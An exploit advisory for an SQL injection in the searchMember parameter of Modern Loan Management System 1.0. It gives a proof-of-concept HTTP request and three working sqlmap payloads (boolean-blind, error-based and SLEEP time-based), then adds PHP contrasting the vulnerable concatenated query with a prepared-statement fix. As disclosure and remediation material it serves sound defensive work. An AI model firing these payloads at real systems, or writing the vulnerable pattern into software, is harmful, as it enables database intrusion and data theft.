Exploit Title: SQL Injection in Modern Loan Management System 1.0
Date: 09/21/2024
Vendor Homepage: https://www.sourcecodester.com/users/mayurik
Software Link: https://www.sourcecodester.com/php/14570/modern-loan-management-system-project-phpmysql-full-source-code.html
Version: 1.0
Description: The searchMember POST parameter handled by search_member.php in the Modern Loan Management System developed by mayuri_k is vulnerable to SQL injection.
Tested on: Windows 10 + Apache + MySQL + PHP 5.4.45
POC:
POST /CVE/admin/index.php?page=search_member HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=lp2f9spshgfvq15min3jn6fr23
Content-Length: 79
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Host: 127.0.0.1
Connection: Keep-alive
searchMember=1*&sub=Search%20Member
sqlmap identified the following injection point(s) with a total of 259 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: searchMember=1' AND 6653=6653 AND 'MRlN'='MRlN&sub=Search Member
Type: error-based
Title: MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: searchMember=1' AND ROW(7902,9590)>(SELECT COUNT(*),CONCAT(0x7171767a71,(SELECT (ELT(7902=7902,1))),0x716b766271,FLOOR(RAND(0)*2))x FROM (SELECT 9320 UNION SELECT 3819 UNION SELECT 9777 UNION SELECT 6003)a GROUP BY x) AND 'AOku'='AOku&sub=Search Member
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: searchMember=1' AND (SELECT 3824 FROM (SELECT(SLEEP(5)))mqcw) AND 'QBJY'='QBJY&sub=Search Member
---
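All three sqlmap findings above have the same root cause: the searchMember value reaches the database as part of the SQL text. The PHP below is an added illustration, not code from the Modern Loan Management System, showing that concatenation pattern beside a prepared-statement fix. The table and column names (members, member_name), the $conn mysqli handle and the LIKE-based search are assumptions; the advisory does not show the application's real query.

```php
<?php
// Added illustration, not the Modern Loan Management System's own code.
// Assumptions: a `members` table with `id` and `member_name` columns,
// a connected mysqli handle in $conn, and a LIKE-based name search.

// Vulnerable pattern: $term is spliced into the SQL text, so a single
// quote in searchMember closes the string literal and the rest of the
// input is parsed as SQL. This is what the boolean-, error- and
// time-based payloads reported above rely on.
function searchMemberVulnerable(mysqli $conn, $term)
{
    $sql = "SELECT id, member_name FROM members "
         . "WHERE member_name LIKE '%" . $term . "%'";
    $result = $conn->query($sql);
    return $result ? $result->fetch_all(MYSQLI_ASSOC) : array();
}

// Fixed pattern: the value is bound as a parameter of a prepared
// statement, so the server always treats it as data, never as SQL.
function searchMemberSafe(mysqli $conn, $term)
{
    $stmt = $conn->prepare(
        "SELECT id, member_name FROM members WHERE member_name LIKE ?"
    );
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $conn->error);
    }
    // Escape LIKE wildcards so a search term of "%" or "_" does not
    // silently match every member (MySQL's default ESCAPE is backslash).
    $pattern = '%' . addcslashes($term, '%_\\') . '%';
    $stmt->bind_param('s', $pattern);
    $stmt->execute();
    $rows = $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
    $stmt->close();
    return $rows;
}

// How search_member.php could call the fixed version (assumed glue code):
// $conn = new mysqli('localhost', 'dbuser', 'dbpass', 'loan_db');
// $term = isset($_POST['searchMember']) ? $_POST['searchMember'] : '';
// $rows = searchMemberSafe($conn, $term);
```

Binding the parameter removes all three injection variants at once, and the same change should be applied to every other query in the application that is built from request data. Separately, the error-based technique only works because MySQL error text is echoed back to the client, so a production deployment should also stop displaying database errors to users.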